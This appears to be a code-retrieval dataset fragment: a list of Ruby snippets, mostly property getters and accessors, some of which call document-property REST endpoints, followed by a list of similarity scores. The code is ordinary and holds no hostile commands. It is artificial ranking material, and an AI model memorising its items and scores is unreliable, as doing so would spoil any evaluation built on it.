"def get_property(propertyName,exception = nil)\n propertyName = JS::String.create_with_utf8cstring(propertyName)\n res = super(context,self,propertyName,exception)\n\n \n val_ref = JS::Value.from_pointer_with_context(context,res)\n ret = val_ref.to_ruby\n if ret.is_a?(JS::Value)\n return check_use(ret) || is_self(ret) || ret\n else\n return check_use(ret) || ret\n end\n \n \n end",
"def property_value(property_key, default_value=nil)\n prop=property(property_key)\n if default_value && property_key=='depth'\n # we're in SQALE.... Keep the text_value\n result = (prop ? prop.text_value : nil)||default_value\n else\n result = (prop ? prop.value : nil)\n unless result\n property_definition=java_definition.getWidgetProperty(property_key)\n result = WidgetProperty.text_to_value(property_definition.defaultValue(), property_definition.type().name()) if property_definition\n end\n end\n result\n end",
"def get_property(property, data, uri = nil, is_url: false, single: true, &block)\n values = data ? data[property] : nil\n if values.is_a?(Array)\n values = values.map { |value| get_property_value(value, is_url: is_url, &block) }\n single ? values[0] : values\n else\n value = get_property_value(values, is_url: is_url, &block)\n single ? value : [value]\n end\n end",
"def property_reader(property)\n define_method \"#{property}\" do\n value = instance_variable_get(\"@#{property}\")\n if value.nil? && partial? && persisted?\n instance_variable_get(\"@#{property}\")\n else\n value\n end\n end\n end",
"def [](key)\n get_property(key)\n end",
"def property(name)\n ensure_valid\n return property_cache[name] if property_cache.include? name\n prop = self.class.properties[name]\n raise \"No such property #{name}\" if not prop\n property_cache[name] = prop.get(@model, @path)\n end",
"def attribute_get(name)\n \n name = name.to_sym\n \n if properties.has_key?(name)\n properties[name].get(self)\n else\n nil\n end\n \n end",
"def get_property_value(value, is_url: false)\n # Assume hash values are a type/value pair\n if value.is_a?(Hash)\n type = value['type']\n value = value['value']\n else\n type = nil\n end\n # Apply transformations to string properties\n value = transform(value, is_url: is_url) if value.is_a?(String)\n # If a block is present, return the result of the block\n return yield(value, type) if block_given?\n # Otherwise return the value\n value\n end",
"def get_property(name, default= \"\")\n\t\treturn @transport.get_path(\"meta\",\"properties\", name) { default }\n\tend",
"def css_value(locator, property)\n find_element(locator).css_value(property)\n end",
"def property_name\n property.display_name\n end",
"def property(prop)\n return unless @parsed.property_any_supported?(prop)\n return unless result = @parsed.public_send(prop)\n\n puts yield(result)\n end",
"def name\n @property_name\n end",
"def get_property(key, default_value = nil)\n end",
"def value\n\t\t# This bizarre construct is done in order to not be reliant\n\t\t# on the inherent assignment-order when using Property.new({...})\n\t\t# since that hash can be ordered anywhich way .daniel\n\t\tif value_id\n\t\t\tvalue_object.value\n\t\telse\t\t\t\n\t\t\t@value\n\t\tend\n\tend",
"def get_p(component, property, componentInfo=nil)\n return $marathon.getProperty(ComponentId.new(component, componentInfo), property)\nend",
"def value(attribute, document, property_hash)\n proc = property_hash[:read_proc]\n if proc\n proc.call(document)\n else\n document[attribute == :id ? :_id : attribute]\n # An alternate way is:\n #\n # document.send(attribute == :id ? :_id : attribute)\n #\n # This will work; however, it would be confusing to support\n # properties backed by model methods here if we don't do it \n # everywhere. And supporting it everywhere would be tricky.\n #\n # For example, the filtering code relies on using MongoDB to\n # search the database. If we supported properties backed by model\n # methods, filtering / searching would be more complicated and\n # expensive.\n end\n end",
"def get_property(node, name)\n node.xpath(name).text\n end",
"def [](property); end",
"def get_p(component, property, componentInfo=nil)\n return $marathon.getProperty(ComponentId.new(component, componentInfo), property)\nend",
"def css_value(prop); end",
"def fetch_property(name)\n properties.where(\"name = ?\", name).first\n end",
"def prop(field, name)\n value = nil\n unless field.nil?\n value = value_by_key(field, name)\n value = value&.html_safe if value.is_a?(String)\n end\n value\n end",
"def [](key); self.properties[key.to_s]; end",
"def get_property_value(value, is_url: false, &block)\n # Assume hash values are a type/value pair\n if value.is_a?(Hash)\n value_type = value['type']\n value = value['value']\n else\n value_type = nil\n end\n # Apply transformations to string properties\n value = transform_property_value(value, value_type, is_url: is_url) if value.is_a?(String)\n # Return the value or the result of calling the given block on the value\n block ? block.call(value, value_type) : value\n end",
"def property?(name); end",
"def [](name)\n self.persistent_class.get_property(name.to_s) rescue nil\n end",
"def record_value(record, property)\n case record\n when Hash\n record.fetch(property, record[property.field])\n when Resource\n property.get!(record)\n end\n end",
"def get\n val\n end",
"def get\n val\n end",
"def get_value name\n get name\n end",
"def name_property\n p = properties.find { |n, p| p.name_property? }\n p ? p.first : nil\n end",
"def get_property property_name\n\n begin\n\n if property_name == ''\n raise 'Property name not specified.'\n end\n\n str_uri = $product_uri + '/words/' + @filename + '/documentProperties/' + property_name\n signed_str_uri = Aspose::Cloud::Common::Utils.sign(str_uri)\n\n response_stream = RestClient.get(signed_str_uri, {:accept => 'application/json'})\n\n stream_hash = JSON.parse(response_stream)\n stream_hash['Code'] == 200 ? stream_hash['DocumentProperty'] : false\n\n rescue Exception => e\n print e\n end\n\n end",
"def get_property property_name\n \n begin\n \n if @filename == ''\n raise 'Base file not specified.'\n end\n \n if property_name == ''\n raise 'Property name not specified.'\n end\n \n str_uri = $product_uri + '/slides/' + @filename + '/documentProperties/' + property_name\n signed_str_uri = Aspose::Cloud::Common::Utils.sign(str_uri)\n \n response_stream = RestClient.get(signed_str_uri,{:accept=>'application/json'})\n \n stream_hash = JSON.parse(response_stream)\n \n if(stream_hash['Code'] == 200)\n return stream_hash['DocumentProperty']\n else\n return false\n end\n \n rescue Exception=>e\n print e\n end\n \n end",
"def [](key)\n @properties[key]\n end",
"def [](key)\n @properties[key]\n end",
"def [](key)\n @properties[key]\n end",
"def get_property(name)\n Config::Collection.get(name)\n end",
"def get_site_property( site_id, property_name )\n client = prepare_request( @service_wsdl )\n\n response = do_request_and_handle_errors do\n client.request :get_site_property do |soap|\n soap.body = {:sessionid => @session, :siteid => site_id, :propname => property_name}\n end\n end\n\n result = response.to_hash[:get_site_property_response][:get_site_property_return]\n\n (result.kind_of? Hash) ? (return false) : (return true)\n end",
"def get(value)\n value\n end",
"def property(name)\n (obj = @parameters[name.intern] and obj.is_a?(Puppet::Property)) ? obj : nil\n end",
"def current_property\n @property = Property.find(params[:id])\n end",
"def get_value\n @value\n end",
"def prop_expr( field )\n\t\t\treturn Sequel.pg_jsonb( :prop ).get_text( field.to_s )\n\t\tend",
"def get_property property_name\n \n begin\n \n if @filename == \"\"\n raise \"Base file not specified.\"\n end\n \n if property_name == \"\"\n raise \"Property name not specified.\"\n end\n \n str_uri = $productURI + \"/words/\" + @filename + \"/documentProperties/\" + property_name\n signed_str_uri = Common::Utils.sign(str_uri)\n \n response_stream = RestClient.get(signed_str_uri,{:accept=>\"application/json\"})\n \n stream_hash = JSON.parse(response_stream)\n \n if(stream_hash[\"Code\"] == 200)\n return stream_hash[\"DocumentProperty\"]\n else\n return false\n end\n \n rescue Exception=>e\n print e\n end\n \n end",
"def get(index)\n properties = index.split('.')\n get_value(properties, props)\n end",
"def get_property(name)\n if @properties[name]\n return @properties[name]\n elsif superdescriptor.is_a?(Descriptor)\n return superdescriptor.get_property(name)\n else\n # Search class-based hierarchy\n clazz = superdescriptor\n while !clazz.nil?\n property = PropertyRegistry.get_property(clazz, name)\n if property\n return property\n end\n \n clazz = clazz.superclass\n end\n end\n end",
"def value\n attributes.fetch(:value)\n end",
"def [](property)\n @assigns[property.to_s]\n end",
"def [](key)\n return unless property?(key)\n if @_wrapper and @_wrapper.class.marshal?(key)\n Marshal.load(String.from_java_bytes(get_property(key.to_s)))\n else\n get_property(key.to_s)\n end\n end",
"def get_property_at_index(propertyIndex,exception = nil)\n res = super(context,self,propertyIndex,exception)\n\n \n val_ref = JS::Value.from_pointer_with_context(context,res)\n ret = val_ref.to_ruby\n if ret.is_a?(JS::Value)\n return check_use(ret) || is_self(ret) || ret\n else\n return check_use(ret) || ret\n end\n \n \n end",
"def property(property_name, options = T.unsafe(nil)); end",
"def property(property_name, options = T.unsafe(nil)); end",
"def create_property_getter(property)\n # meth = property.name\n class_eval <<-EOS, __FILE__, __LINE__ + 1\n def #{property.name}\n self['#{property.name}']\n end\n EOS\n\n if property.type == 'boolean'\n class_eval <<-EOS, __FILE__, __LINE__\n def #{property.name}?\n if self['#{property.name}'].nil? || self['#{property.name}'] == false || self['#{property.name}'].to_s.downcase == 'false'\n false\n else\n true\n end\n end\n EOS\n end\n\n if property.alias\n class_eval <<-EOS, __FILE__, __LINE__ + 1\n alias #{property.alias.to_sym} #{property.name.to_sym}\n EOS\n end\n end",
"def get(param)\n @property_hash[param.intern] || :absent\n end",
"def property( name )\n ( @properties ||= Hash.new )[ name ]\n end",
"def getText\n return getProperty('text').to_s\n end",
"def getvalue\n @variable.get_value @name\n end",
"def get_property(attribute)\n `var el=this.__native__,attr=attribute.__value__,key=c$Element.__keyed_attributes__[attr],bool=c$Element.__boolean_attributes__[attr]`\n `var value=key||bool?el[key||bool]:el.getAttribute(attr,2)`\n return `bool ? !!value : (value==null) ? nil : $q(value)`\n end"
] | [
"0.844763",
"0.8174971",
"0.7957079",
"0.7908404",
"0.7883862",
"0.78775865",
"0.7710518",
"0.76202506",
"0.76007766",
"0.7599103",
"0.7534369",
"0.74720305",
"0.7430656",
"0.7392318",
"0.73604846",
"0.735042",
"0.731903",
"0.7311109",
"0.7249772",
"0.7119159",
"0.70912987",
"0.7075355",
"0.705487",
"0.7039512",
"0.7023578",
"0.70014894",
"0.6968426",
"0.69496226",
"0.69416666",
"0.69402725",
"0.69304216",
"0.68615454",
"0.6850998",
"0.6844094",
"0.68103546",
"0.6807937",
"0.6765857",
"0.67594486",
"0.6737044",
"0.6715325",
"0.67148346",
"0.6703573",
"0.6691636",
"0.6687392",
"0.6655217",
"0.6653096",
"0.6633633",
"0.66183937",
"0.65988386",
"0.65935504",
"0.65857804",
"0.65815294",
"0.6566953",
"0.6539039",
"0.65344554",
"0.6524029",
"0.6521727",
"0.65206164",
"0.65140647",
"0.6496574",
"0.6492155",
"0.6491048",
"0.6484852",
"0.648012",
"0.64723223",
"0.6449743",
"0.64083517",
"0.64074194",
"0.6402676",
"0.63831705",
"0.63831705",
"0.6377086",
"0.63739747",
"0.6372292",
"0.63663",
"0.63621986",
"0.63621986",
"0.63621986",
"0.6351896",
"0.6337745",
"0.63339484",
"0.6332808",
"0.6313623",
"0.62822",
"0.6281085",
"0.6270167",
"0.62417394",
"0.62276816",
"0.621189",
"0.61936",
"0.61912596",
"0.618193",
"0.61767966",
"0.61767966",
"0.61692685",
"0.61663204",
"0.61649454",
"0.61478937",
"0.6140909",
"0.6128709"
] | 0.6808081 | 35 |
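A hypothetical call site for the get_property document above, assuming the values in data follow the type/value-pair convention handled by the companion get_property_value (which appears as a later record in this dump):

data = {
  'title'   => { 'type' => 'literal', 'value' => 'Annual report' },
  'creator' => [{ 'value' => 'A. Smith' }, { 'value' => 'B. Jones' }]
}

get_property('title', data)                  # => "Annual report" (single: true by default)
get_property('creator', data, single: false) # => ["A. Smith", "B. Jones"]

# The optional block receives (value, type) for custom post-processing:
get_property('title', data) { |value, type| "#{value} (#{type})" }
# => "Annual report (literal)"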
Returns a string representation of the APIObject instance (the URI) | def to_s
uri.to_s
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def inspect\n \"#<#{self.class}:#{object_id.to_s(16)} #{uri.inspect}>\"\n end",
"def inspect\n sprintf(\"#<%s:%#0x URI:%s>\", URI.to_s, self.object_id, self.to_s)\n end",
"def inspect\n return sprintf(\n \"#<%s:%#0x URI:%s>\",\n self.class.to_s, self.object_id, self.uri.to_s\n )\n end",
"def to_s\n reconstruct_uri\n end",
"def to_s\n uri_string\n end",
"def to_s\n \"ROD REST API client\"\n end",
"def to_s\n @uri.to_s\n end",
"def to_s\n @uri.to_s\n end",
"def to_s\n self.uri.to_s\n end",
"def to_s\n uri\n end",
"def to_s\n '#<Twilio::REST::FrontlineApi>'\n end",
"def to_s\n @uri\n end",
"def uri\n params = {\n center: location,\n size: size,\n zoom: zoom,\n format: file_format,\n sensor: sensor.to_s\n }\n Addressable::URI.parse(api_endpoint).tap do |uri|\n uri.query_values = params\n end.to_s\n end",
"def to_s\n [\n +\"#<#{self.class}\",\n +\" id=#{id}\",\n +\" uri=#{uri}\",\n +\" endpoints=#{endpoints_string}\",\n +\">\",\n ].join(\"\")\n end",
"def to_s\n @uri\n end",
"def to_s\n\t\t\"#{@api_hash}\"\n\tend",
"def inspect()\n '#<#{self.class}:#{object_id} @url=\\'#{@resturl}\\' @sslcheck=#{@sslcheck} @timeout=#{@timeout}>'\n end",
"def to_s\n @url\n end",
"def to_s\n url\n end",
"def to_s; \"#<Veritable::API url='#{api_base_url}'>\"; end",
"def to_s; @url; end",
"def rest_url_document\n template = ::Addressable::Template.new(current_resource.class.rest_api_document)\n template.expand(property_map).to_s\n end",
"def to_api\n params_as_querystring = @params.marshal_dump.map{ |key|\n k = key.first.to_s.gsub('_', '-')\n v = URI::encode key[1]\n \"%s=%s\" % [k, v]\n }.join(\"&\")\n \"%s?%s\" % ['api/' + @path, params_as_querystring]\n end",
"def to_uri\n build_uri\n end",
"def to_s\n @object.to_s\n end",
"def to_s\n str = ''.dup\n if @scheme\n str << @scheme\n str << ':'\n end\n\n if @opaque\n str << @opaque\n else\n if @host || %w[file postgres].include?(@scheme)\n str << '//'\n end\n if self.userinfo\n str << self.userinfo\n str << '@'\n end\n if @host\n str << @host\n end\n if @port && @port != self.default_port\n str << ':'\n str << @port.to_s\n end\n str << @path\n if @query\n str << '?'\n str << @query\n end\n end\n if @fragment\n str << '#'\n str << @fragment\n end\n str\n end",
"def inspect\n sprintf(\"#<%s:%#0x(%s)>\", self.class.name, __id__, uri.to_s)\n end",
"def inspect\n sprintf(\"#<%s:%#0x(%s)>\", self.class.name, __id__, uri.to_s)\n end",
"def to_s\n object.to_s\n end",
"def to_s\n \"#{http_methods.join(\" / \")} #{path}\"\n end",
"def to_s\n \"#{self.class}#url: #{url}\"\n end",
"def to_s\n url\n end",
"def to_s\n out = \"#{@http_method} #{@uri.request_uri} HTTP/1.1\\r\\n\"\n out << \"host: #{@uri.host}:#{@uri.port}\\r\\n\"\n\n self.http_request.each do |name, value|\n out << \"#{name}: #{value}\\r\\n\" unless name =~ /host/i\n end\n\n out << \"\\r\\n\"\n out << @body.to_s\n end",
"def to_s\n '<Twilio::REST::Api::V2010>';\n end",
"def to_s\n \"#<#{self.class.name}:#{object_id} #{info}>\"\n end",
"def to_s\n [\n (\"#{@protocol}://\" if @protocol),\n (\"#{@userinfo}@\" if @userinfo),\n @host,\n (\":#{@port}\" if @port),\n @registry,\n @path,\n (\"?#{@query}\" if @query),\n (\"##{@fragment}\" if @fragment)\n ].join\n end",
"def uri\n @uri.to_s\n end",
"def to_s\n\t\turl.to_s\n\tend",
"def to_s\n \"#<ArtifactoryApi::Client>\"\n end",
"def to_url\n to_uri.to_s\n end",
"def to_url\n\t\t\tto_uri.to_s\n\t\tend",
"def serialize(object)\n object.to_s\n end",
"def to_s\n \"#<#{self.class.name}:0x#{object_id.to_s(16).rjust(14, \"0\")} host='#{client.host}'>\"\n end",
"def to_s\n ret = {}\n ret[:url] = @url\n ret[:attr] = @attr.to_s\n ret.to_s\n end",
"def inspect\n { method: method, uri: uri.to_s, headers: headers, body: body }.inspect\n end",
"def to_s\n @uri_string ||=\n begin\n uri_string = \"#{normalized_authority}:#{normalized_path}\"\n if uri_string.respond_to?(:force_encoding)\n uri_string.force_encoding(Encoding::UTF_8)\n end\n uri_string\n end\n end",
"def inspect\n \"#<#{self.class.name}:0x#{object_id}\\n @base_url=\\\"#{@base_url}\\\"\\n @most_recent_page=#{@most_recent_page}>\"\n end",
"def to_s\n \"#{@base_url}?#{query}\"\n end",
"def to_s\n \"#{scheme}://#{host}#{path}\"\n end",
"def inspect\n \"#<#{self.class.name}: api_id=#{api_id.inspect}>\"\n end",
"def api_url\n \"#{@@base_url}/#{format}/#{resource}?apikey=#{@@api_key}#{parameters}\"\n end",
"def to_s\n \"#{self.class.to_s}::<#{object_id}> Args: #{args}\"\n end",
"def inspect\n sprintf(\"#<%s:%#0x(%s)>\", self.class.name, __id__, url.to_s)\n end",
"def inspect\n sprintf(\"#<%s:%#0x(%s)>\", self.class.name, __id__, url.to_s)\n end",
"def inspect\n \"#<#{self.class.name}:#{object_id} {path: #{path.inspect}}>\"\n end",
"def to_s\n \"#{base_url}?#{to_query(convert)}\"\n end",
"def build_uri(resource)\n URI(\"#{API_URL}/#{resource}\")\n end",
"def uri\n self + \"\"\n end",
"def uri\n self + \"\"\n end",
"def getURI()\n return @uri.to_s\n end",
"def to_s\n '<Twilio::REST::Proxy::V1>'\n end",
"def to_s\n out = \"#{@http_method} #{@uri.request_uri} HTTP/1.1\\r\\n\"\n out << \"Host: #{@uri.host}:#{@uri.port}\\r\\n\"\n\n http_request.each do |name, value|\n out << \"#{name}: #{value}\\r\\n\" unless name =~ /host/i\n end\n\n out << \"\\r\\n\"\n\n if @body.respond_to?(:read)\n out << @body.read\n elsif Kronk::Multipart === @body\n out << @body.to_io.read\n else\n out << @body.to_s\n end\n end",
"def serialized_path(object); end",
"def serialized_path(object); end",
"def uri_path\n __getobj__.uri.path\n end",
"def to_s\n \"#<#{ self.class.name } name=#{ name.inspect } path=#{ path.to_s }>\"\n end",
"def inspect\n \"#<#{self.class}: #{(uri rescue opts).inspect}>\" \n end",
"def inspect\n \"#<#{self.class}: #{(uri rescue opts).inspect}>\" \n end",
"def inspect\n return \"#<EU:#{path.join(\"/\")}>:#{\"%#x\" % self.object_id}\"\n rescue\n super\n end",
"def to_s\n\n output = \"\"\n\n path = \"/\" + @prefix.join('/')\n @endpoints.each do |route|\n output += \"#{route[:method].to_s.upcase} #{path}\\n\"\n end\n @subroutes.each do |k, subroute|\n output += subroute.to_s\n end\n\n output\n\n end",
"def api_url\n ensure_full_data!\n @gapi[\"selfLink\"]\n end",
"def to_uri info: false\n if info\n URI(_info_uri)\n else\n URI(_http_url)\n end\n end",
"def to_s\n return '' unless scheme && path\n\n uri = \"#{scheme}:/#{path}\"\n\n if query?\n query_string = query.map { |key, value| \"#{key}=#{value}\" }.join('&')\n\n uri += \"?#{query_string}\"\n end\n\n uri\n end",
"def url\n \"/#{self.class.rest_name}s/#{id}\"\n end",
"def to_s\n \"#<\" + self.class.name + \": \" + href + \">\"\n end",
"def to_s\n\t\tres = \"\\nname: \" + name.to_s + \"\\nid: \" + id.to_s + \"\\nservice: \" + service.to_s + \"\\ntitle: \" + title.to_s + \"\\nthumbnail: \" + thumbnail.to_s + \"\\nhref: \" + href.to_s\n\t\tres\n\tend",
"def to_addressable_uri\n @uri\n end",
"def to_s\n @to_s ||= \"http#{http.use_ssl? ? 's' : ''}://#{http.address}:#{http.port}\"\n end",
"def uri\n \"#{@@config[:base_uri]}#{id}\"\n end",
"def url\n uri.to_s\n end",
"def to_s\n @path\n end",
"def inspect #:nodoc:\n \"#<%s:0x%s '%s'>\" % [self.class, object_id, path]\n end",
"def to_s\n @path\n end",
"def uri\n uri_for({}, nil)\n end",
"def inspect\n id_string = (respond_to?(:id) && !id.nil?) ? \" id=#{id}\" : ''\n \"#<#{self.class}:0x#{object_id.to_s(16)}#{id_string}> JSON: \" +\n Clever::JSON.dump(@values, pretty: true)\n end",
"def api_uri\n options.endpoint\n end",
"def to_s\n @path\n end",
"def url\n URI.parse(endpoint).join(path.to_s).to_s\n end",
"def get_uri\n request_object.uri\n end",
"def url\n uri.to_s\n end",
"def to_s\n str = @type.to_s.upcase\n if @uri and not @uri.empty?\n str << \"; URI: #{@uri}\"\n end\n str << \"; line #{@line}\"\n if @message and not @message.empty?\n str << \": #{@message}\"\n end\n return str\n end",
"def to_s\n \"#{self.name} => #{self.link}\"\n end",
"def to_s\n \"#<#{self.class.name}:#{object_id}> @names=#{names}>\"\n end",
"def to_s\n self.ref\n end",
"def to_uri\n URI.parse self\n end",
"def to_s\r\n\t\t\t`#{BITS::BITSADMIN} /info {#{@id}}`\r\n\t\tend",
"def inspect\n String.new('#<').concat(\n self.class.name, ':',\n object_id.to_s, ' ', to_s, '>'\n )\n end",
"def inspect\n String.new('#<').concat(\n self.class.name, ':',\n object_id.to_s, ' ', to_s, '>'\n )\n end",
"def inspect\n String.new('#<').concat(\n self.class.name, ':',\n object_id.to_s, ' ', to_s, '>'\n )\n end",
"def inspect\n String.new('#<').concat(\n self.class.name, ':',\n object_id.to_s, ' ', to_s, '>'\n )\n end"
] | [
"0.74984515",
"0.74076825",
"0.72245973",
"0.7189676",
"0.70629364",
"0.7042799",
"0.7028747",
"0.7028747",
"0.69840956",
"0.6932379",
"0.68574905",
"0.6845644",
"0.6839828",
"0.68012464",
"0.6775751",
"0.6720985",
"0.66213286",
"0.6602574",
"0.6591272",
"0.65530396",
"0.65206367",
"0.650205",
"0.6487595",
"0.64854264",
"0.6481888",
"0.6480297",
"0.63970494",
"0.63970494",
"0.63864",
"0.63811165",
"0.63549",
"0.6346517",
"0.63073033",
"0.6300488",
"0.6299044",
"0.62983495",
"0.62837034",
"0.62798345",
"0.618952",
"0.61874986",
"0.6185512",
"0.6182789",
"0.6161445",
"0.61393917",
"0.6136924",
"0.61132646",
"0.61127466",
"0.61022687",
"0.61017936",
"0.6101124",
"0.61000615",
"0.6098185",
"0.6070859",
"0.6070859",
"0.6049959",
"0.60478055",
"0.6043514",
"0.6037653",
"0.6037653",
"0.60364926",
"0.6034753",
"0.60340095",
"0.6018126",
"0.6018126",
"0.60148764",
"0.6001634",
"0.5982119",
"0.5982119",
"0.59755176",
"0.59712714",
"0.5965021",
"0.5960389",
"0.59575105",
"0.59551895",
"0.59527004",
"0.5950752",
"0.59498125",
"0.5944819",
"0.5922646",
"0.59153575",
"0.59048796",
"0.5904734",
"0.5902748",
"0.59007186",
"0.58936685",
"0.5880047",
"0.58774745",
"0.58772784",
"0.58771616",
"0.58729154",
"0.5867341",
"0.5861548",
"0.5858172",
"0.5836221",
"0.5830759",
"0.58302337",
"0.5830169",
"0.5830169",
"0.5830169",
"0.5830169"
] | 0.69544876 | 9 |
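Delegating to_s to the stored URI lets an instance interpolate directly as its identifier; a small sketch (APIObject is a stand-in name for whatever class hosts the method above, and a uri accessor is assumed):

obj = APIObject.new
obj.uri = 'http://example.org/resource/1'
"Fetched #{obj}" # => "Fetched http://example.org/resource/1"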
Sets the URI of the object | def uri=(u)
# Remove any format extension (.json, .rdf etc.)
ext = File.extname(u)
@uri = ext.nil? || ext.empty? ? u : u.rpartition(ext)[0]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def uri=(value)\n @uri = value\n end",
"def uri=(value)\n @uri = value\n end",
"def uri= new_uri\n @uri = self.class.build_uri new_uri\n end",
"def set_uri(base, path)\n @uri = \"#{base}/#{path}/#{self.identifier}\"\n end",
"def uri=(uri)\n @uri = uri.to_s.dup.freeze\n update_uri_with_version\n end",
"def set_uri\n self.uri ||= \"#{DEFAULT_BUCKET_NAME}/#{DEFAULT_PREFIX_BASE}/#{storable.key_prefix}/#{key}\"\n end",
"def uri=(val)\n self.title = self.class.id_from_uri(val)\n if self.title\n self.title = self.title.titleize \n end\n self.uri_path = self.class.scope_from_uri(val)\n end",
"def uri string = nil\n string ? @uri = string : @uri\n end",
"def initialize uri\n self.uri = uri\n end",
"def setup_uri_path\n self.uri_path = self.class.scope_from_uri(self.uri)\n end",
"def uri=(value)\n @uris << value\n end",
"def uri=(_arg0); end",
"def uri=(_arg0); end",
"def uri=(_arg0); end",
"def uri=(_arg0); end",
"def url=(uri)\n @conn = nil\n @url = uri\n end",
"def uri\n read_attr :uri\n end",
"def uri(path=nil)\n (path and @uri = path) or @uri\n end",
"def base_url=(uri)\n @base_uri = uri\n end",
"def uri\n @uri\n end",
"def uri\n @uri\n end",
"def uri=(url)\n @uri = URI.parse(url)\n if (with && !connection.request_body_permitted?)\n @uri.query = with\n end\n end",
"def uri\n @uri\n end",
"def uri\n @uri\n end",
"def set_url\n url 'set'\n end",
"def uri\n @_uri ||= URI(@url)\n end",
"def uri\n @_uri ||= URI(@url)\n end",
"def create_uri\n end",
"def uri\n \n end",
"def base_uri=(uri)\n # If the baseUri does not end with a slash, we must add it\n uri += '/' unless uri[-1] == '/'\n @base_uri = uri\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def initialize(uri:)\n @uri = uri\n end",
"def data_uri=(uri)\n assign_data_uri(uri)\n @data_uri = uri\n end",
"def set_urij\n @urij = Urij.find(params[:id])\n end",
"def uri\n self + \"\"\n end",
"def uri\n self + \"\"\n end",
"def set_url\n @url = DEFAULT_URL\n end",
"def url=(value)\n if value.nil?\n @url = nil\n else\n @url = Addressable::URI.parse(value)\n @url.path << '/' unless @url.path.end_with?('/')\n end\n end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri\n raise NotImplementedError\n end",
"def request_path(*args)\n if has_attribute? :uri then uri else super end\n end",
"def get\n uri\n super()\n end",
"def get\n uri\n super()\n end",
"def get\n uri\n super()\n end",
"def uri\n @uri_parameters = {:s => @company}\n super() \n end",
"def uri\n N::URI.new(self[:uri])\n end",
"def uri\n N::URI.new(self[:uri])\n end",
"def set_base_uri(uri)\n @base_api_uri = uri\n end",
"def uri\n \"#{base_uri}#{path}\"\n end",
"def base_uri=(uri)\n s9_document_builder.setBaseURI(java.net.URI.new(uri.to_s))\n end",
"def uri(string)\n return if string.blank?\n\n string = URI(string) unless string.is_a?(URI)\n\n # Rewrite host if necessary\n return string unless MetalArchives.config.endpoint\n\n endpoint = URI(MetalArchives.config.endpoint)\n\n string\n .tap { |u| u.host = endpoint.host }\n .tap { |u| u.scheme = endpoint.scheme }\n .tap { |u| u.port = endpoint.port }\n end",
"def uri\n nil\n end",
"def uri\n attributes.fetch(:uri)\n end",
"def uri\n attributes.fetch(:uri)\n end",
"def uri!\n @uri = URI.parse \"#{@config.http_scheme}://#{@config.host}:#{@config.port}/api/#{@config.api_version}/\"\n end",
"def router_uri_prefix=(uri_prefix)\n if respond_to?(:uri=)\n self.uri = (uri_prefix.empty? ? '/' : uri_prefix)\n end\n @router_uri_prefix = uri_prefix\n end",
"def set_uriy\n @uriy = Uriy.find(params[:id])\n end",
"def uri\n ::Spyke::Path.new(@uri_template, fmrest_uri_attributes) if @uri_template\n end",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def uri= uri_or_string\n if uri_or_string.respond_to?(:host)\n @uri = uri_or_string\n else\n string = uri_or_string =~ /^http/ ? uri_or_string : 'http://' + uri_or_string.to_s\n @uri = URI.parse(string)\n end\n @server = Net::HTTP.new(uri.host, uri.port)\n end",
"def location= uri\n native.open uri\n end",
"def uri(options = {})\n options[\"uri\"] || build_uri(options)\n end",
"def uri\n return @uri\n end",
"def uri\n return @uri\n end",
"def uri\n\t\turi = self.directory.uri\n\t\turi.dn = self.dn\n\t\treturn uri\n\tend",
"def uri\n opts[:uri]\n end",
"def uri\n @uri.to_s\n end",
"def into(uri)\n @into = RDF::URI(uri)\n self\n end",
"def base_uri=(new_base_uri)\n @base_uri = new_base_uri\n end",
"def update_uri(p)\n update_attribute(:uri_actual, p)\n end"
] | [
"0.79979783",
"0.79979783",
"0.7790412",
"0.77748376",
"0.72962356",
"0.71812826",
"0.70826846",
"0.6975819",
"0.6934346",
"0.68815947",
"0.6829507",
"0.6769047",
"0.6769047",
"0.6769047",
"0.6769047",
"0.6746032",
"0.6729175",
"0.6725151",
"0.6725106",
"0.67051774",
"0.67051774",
"0.66986465",
"0.6665878",
"0.6665878",
"0.6605784",
"0.66046935",
"0.66046935",
"0.6566116",
"0.6525674",
"0.64927346",
"0.6487851",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.648739",
"0.648208",
"0.6478901",
"0.6478775",
"0.6471745",
"0.6471745",
"0.646927",
"0.6464111",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.6455794",
"0.64408493",
"0.64384466",
"0.64384466",
"0.64384466",
"0.6433005",
"0.6423741",
"0.6423741",
"0.642206",
